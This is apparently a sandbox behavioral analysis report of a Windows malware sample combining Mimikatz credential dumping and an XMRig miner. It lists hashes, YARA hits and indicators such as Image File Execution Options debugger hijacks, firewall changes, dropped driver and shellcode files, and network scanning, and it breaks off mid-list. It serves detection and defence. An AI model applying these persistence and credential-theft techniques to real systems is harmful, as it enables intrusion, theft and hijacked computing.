Analysis
-
max time kernel
142s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
29-01-2025 07:04
Behavioral task
behavioral1
Sample
2025-01-29_234f3e4d3eec61b08a75091f53864135_hacktools_icedid_mimikatz.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2025-01-29_234f3e4d3eec61b08a75091f53864135_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2025-01-29_234f3e4d3eec61b08a75091f53864135_hacktools_icedid_mimikatz.exe
-
Size
9.0MB
-
MD5
234f3e4d3eec61b08a75091f53864135
-
SHA1
5557d690c3b3eba54cd4ec02f9f4e1f01e51eb17
-
SHA256
1ff3b4c8ad067895ed320b36fe005cfd3f8f8e6526204d46760902bb0f63ccd4
-
SHA512
3d81ec8d253e9dd444bab68f7b99186f93d12d4086700245375a0aad17612bdd0751bea89807427739c7ba9ab7bf847ffeab6430f517df97c1051e025bd14495
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYPV:a3jz0E52/iv1w
Malware Config
Signatures
-
Disables service(s) 3 TTPs
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2100 created 2120 2100 zyejeil.exe 38 -
Xmrig family
-
Contacts a large (29806) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
resource yara_rule behavioral2/memory/1432-177-0x00007FF79A770000-0x00007FF79A890000-memory.dmp xmrig behavioral2/memory/1432-181-0x00007FF79A770000-0x00007FF79A890000-memory.dmp xmrig behavioral2/memory/1432-199-0x00007FF79A770000-0x00007FF79A890000-memory.dmp xmrig behavioral2/memory/1432-212-0x00007FF79A770000-0x00007FF79A890000-memory.dmp xmrig behavioral2/memory/1432-225-0x00007FF79A770000-0x00007FF79A890000-memory.dmp xmrig behavioral2/memory/1432-235-0x00007FF79A770000-0x00007FF79A890000-memory.dmp xmrig behavioral2/memory/1432-240-0x00007FF79A770000-0x00007FF79A890000-memory.dmp xmrig behavioral2/memory/1432-497-0x00007FF79A770000-0x00007FF79A890000-memory.dmp xmrig behavioral2/memory/1432-499-0x00007FF79A770000-0x00007FF79A890000-memory.dmp xmrig behavioral2/memory/1432-501-0x00007FF79A770000-0x00007FF79A890000-memory.dmp xmrig behavioral2/memory/1432-739-0x00007FF79A770000-0x00007FF79A890000-memory.dmp xmrig behavioral2/memory/1432-740-0x00007FF79A770000-0x00007FF79A890000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 6 IoCs
resource yara_rule behavioral2/memory/3520-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/3520-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x0007000000023c97-6.dat mimikatz behavioral2/memory/2616-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/4868-136-0x00007FF61A360000-0x00007FF61A44E000-memory.dmp mimikatz behavioral2/memory/4868-137-0x00007FF61A360000-0x00007FF61A44E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts zyejeil.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts zyejeil.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyejeil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe zyejeil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyejeil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe zyejeil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyejeil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe zyejeil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe zyejeil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe zyejeil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyejeil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyejeil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe zyejeil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe zyejeil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyejeil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe zyejeil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyejeil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe zyejeil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe zyejeil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyejeil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe zyejeil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyejeil.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 1768 netsh.exe 60 netsh.exe -
Executes dropped EXE 29 IoCs
pid Process 2616 zyejeil.exe 2100 zyejeil.exe 1568 wpcap.exe 3840 zqkkhilub.exe 4868 vfshost.exe 2804 xohudmc.exe 224 ucqzmelym.exe 2920 lqvjma.exe 1432 ejzklm.exe 1028 ucqzmelym.exe 2992 ucqzmelym.exe 4960 ucqzmelym.exe 916 ucqzmelym.exe 1208 ucqzmelym.exe 1212 ucqzmelym.exe 2632 ucqzmelym.exe 1312 ucqzmelym.exe 2016 ucqzmelym.exe 736 ucqzmelym.exe 2264 zyejeil.exe 4304 ucqzmelym.exe 1928 ucqzmelym.exe 2956 ucqzmelym.exe 3756 ucqzmelym.exe 372 ucqzmelym.exe 2536 ucqzmelym.exe 3068 ucqzmelym.exe 3144 nusubcedp.exe 4828 zyejeil.exe -
Loads dropped DLL 12 IoCs
pid Process 1568 wpcap.exe 1568 wpcap.exe 1568 wpcap.exe 1568 wpcap.exe 1568 wpcap.exe 1568 wpcap.exe 1568 wpcap.exe 1568 wpcap.exe 1568 wpcap.exe 3840 zqkkhilub.exe 3840 zqkkhilub.exe 3840 zqkkhilub.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 66 ifconfig.me 67 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\lqvjma.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 zyejeil.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE zyejeil.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EC98FD874C34E9667158FBB7DEFBD82F zyejeil.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EC98FD874C34E9667158FBB7DEFBD82F zyejeil.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies zyejeil.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 zyejeil.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 zyejeil.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content zyejeil.exe File created C:\Windows\SysWOW64\lqvjma.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft zyejeil.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache zyejeil.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData zyejeil.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe -
resource yara_rule behavioral2/memory/4868-136-0x00007FF61A360000-0x00007FF61A44E000-memory.dmp upx behavioral2/files/0x0007000000023ceb-135.dat upx behavioral2/memory/4868-137-0x00007FF61A360000-0x00007FF61A44E000-memory.dmp upx behavioral2/files/0x0007000000023cf6-144.dat upx behavioral2/memory/224-145-0x00007FF7537B0000-0x00007FF75380B000-memory.dmp upx behavioral2/memory/224-159-0x00007FF7537B0000-0x00007FF75380B000-memory.dmp upx behavioral2/files/0x0007000000023cf3-163.dat upx behavioral2/memory/1432-164-0x00007FF79A770000-0x00007FF79A890000-memory.dmp upx behavioral2/memory/1028-170-0x00007FF7537B0000-0x00007FF75380B000-memory.dmp upx behavioral2/memory/2992-174-0x00007FF7537B0000-0x00007FF75380B000-memory.dmp upx behavioral2/memory/1432-177-0x00007FF79A770000-0x00007FF79A890000-memory.dmp upx behavioral2/memory/4960-179-0x00007FF7537B0000-0x00007FF75380B000-memory.dmp upx behavioral2/memory/1432-181-0x00007FF79A770000-0x00007FF79A890000-memory.dmp upx behavioral2/memory/916-184-0x00007FF7537B0000-0x00007FF75380B000-memory.dmp upx behavioral2/memory/1208-189-0x00007FF7537B0000-0x00007FF75380B000-memory.dmp upx behavioral2/memory/1212-193-0x00007FF7537B0000-0x00007FF75380B000-memory.dmp upx behavioral2/memory/2632-197-0x00007FF7537B0000-0x00007FF75380B000-memory.dmp upx behavioral2/memory/1432-199-0x00007FF79A770000-0x00007FF79A890000-memory.dmp upx behavioral2/memory/1312-202-0x00007FF7537B0000-0x00007FF75380B000-memory.dmp upx behavioral2/memory/2016-206-0x00007FF7537B0000-0x00007FF75380B000-memory.dmp upx behavioral2/memory/736-210-0x00007FF7537B0000-0x00007FF75380B000-memory.dmp upx behavioral2/memory/1432-212-0x00007FF79A770000-0x00007FF79A890000-memory.dmp upx behavioral2/memory/4304-219-0x00007FF7537B0000-0x00007FF75380B000-memory.dmp upx behavioral2/memory/1928-223-0x00007FF7537B0000-0x00007FF75380B000-memory.dmp upx behavioral2/memory/1432-225-0x00007FF79A770000-0x00007FF79A890000-memory.dmp upx behavioral2/memory/2956-228-0x00007FF7537B0000-0x00007FF75380B000-memory.dmp upx behavioral2/memory/3756-232-0x00007FF7537B0000-0x00007FF75380B000-memory.dmp upx behavioral2/memory/372-234-0x00007FF7537B0000-0x00007FF75380B000-memory.dmp upx behavioral2/memory/1432-235-0x00007FF79A770000-0x00007FF79A890000-memory.dmp upx behavioral2/memory/2536-237-0x00007FF7537B0000-0x00007FF75380B000-memory.dmp upx behavioral2/memory/3068-239-0x00007FF7537B0000-0x00007FF75380B000-memory.dmp upx behavioral2/memory/1432-240-0x00007FF79A770000-0x00007FF79A890000-memory.dmp upx behavioral2/memory/1432-497-0x00007FF79A770000-0x00007FF79A890000-memory.dmp upx behavioral2/memory/1432-499-0x00007FF79A770000-0x00007FF79A890000-memory.dmp upx behavioral2/memory/1432-501-0x00007FF79A770000-0x00007FF79A890000-memory.dmp upx behavioral2/memory/1432-739-0x00007FF79A770000-0x00007FF79A890000-memory.dmp upx behavioral2/memory/1432-740-0x00007FF79A770000-0x00007FF79A890000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\lrcwzntnt\UnattendGC\specials\svschost.exe zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\specials\coli-0.dll zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\specials\trfo-2.dll zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\specials\posh-0.dll zyejeil.exe File created C:\Windows\lrcwzntnt\bmkbibntg\wpcap.dll zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\specials\cnli-1.dll zyejeil.exe File created C:\Windows\uzepkltb\svschost.xml zyejeil.exe File opened for modification C:\Windows\uzepkltb\svschost.xml zyejeil.exe File created C:\Windows\lrcwzntnt\bmkbibntg\scan.bat zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\specials\xdvl-0.dll zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\specials\spoolsrv.xml zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\spoolsrv.xml zyejeil.exe File created C:\Windows\lrcwzntnt\Corporate\mimidrv.sys zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\specials\crli-0.dll zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\specials\libxml2.dll zyejeil.exe File opened for modification C:\Windows\uzepkltb\spoolsrv.xml zyejeil.exe File created C:\Windows\lrcwzntnt\bmkbibntg\ip.txt zyejeil.exe File created C:\Windows\uzepkltb\zyejeil.exe 2025-01-29_234f3e4d3eec61b08a75091f53864135_hacktools_icedid_mimikatz.exe File created C:\Windows\lrcwzntnt\UnattendGC\specials\zlib1.dll zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\svschost.xml zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\AppCapture32.dll zyejeil.exe File opened for modification C:\Windows\lrcwzntnt\bmkbibntg\Result.txt nusubcedp.exe File created C:\Windows\lrcwzntnt\UnattendGC\specials\libeay32.dll zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\specials\trch-1.dll zyejeil.exe File opened for modification C:\Windows\lrcwzntnt\bmkbibntg\Packet.dll zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\AppCapture64.dll zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\specials\schoedcl.exe zyejeil.exe File created C:\Windows\lrcwzntnt\bmkbibntg\zqkkhilub.exe zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\specials\docmicfg.exe zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\Shellcode.ini zyejeil.exe File opened for modification C:\Windows\lrcwzntnt\Corporate\log.txt cmd.exe File created C:\Windows\lrcwzntnt\UnattendGC\specials\spoolsrv.exe zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\specials\vimpcsvc.xml zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\specials\schoedcl.xml zyejeil.exe File created C:\Windows\uzepkltb\docmicfg.xml zyejeil.exe File created C:\Windows\lrcwzntnt\bmkbibntg\wpcap.exe zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\vimpcsvc.xml zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\schoedcl.xml zyejeil.exe File created C:\Windows\uzepkltb\spoolsrv.xml zyejeil.exe File created C:\Windows\lrcwzntnt\upbdrjv\swrpwe.exe zyejeil.exe File opened for modification C:\Windows\uzepkltb\zyejeil.exe 2025-01-29_234f3e4d3eec61b08a75091f53864135_hacktools_icedid_mimikatz.exe File created C:\Windows\lrcwzntnt\UnattendGC\docmicfg.xml zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\specials\docmicfg.xml zyejeil.exe File created C:\Windows\uzepkltb\vimpcsvc.xml zyejeil.exe File created C:\Windows\uzepkltb\schoedcl.xml zyejeil.exe File created C:\Windows\lrcwzntnt\Corporate\vfshost.exe zyejeil.exe File created C:\Windows\lrcwzntnt\Corporate\mimilib.dll zyejeil.exe File created C:\Windows\lrcwzntnt\bmkbibntg\nusubcedp.exe zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\specials\exma-1.dll zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\specials\vimpcsvc.exe zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\specials\svschost.xml zyejeil.exe File opened for modification C:\Windows\uzepkltb\vimpcsvc.xml zyejeil.exe File opened for modification C:\Windows\uzepkltb\schoedcl.xml zyejeil.exe File created C:\Windows\ime\zyejeil.exe zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\specials\ssleay32.dll zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\specials\ucl.dll zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\specials\tucl-1.dll zyejeil.exe File opened for modification C:\Windows\uzepkltb\docmicfg.xml zyejeil.exe File created C:\Windows\lrcwzntnt\bmkbibntg\Packet.dll zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\specials\tibe-2.dll zyejeil.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2460 sc.exe 2248 sc.exe 1704 sc.exe 392 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zqkkhilub.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened 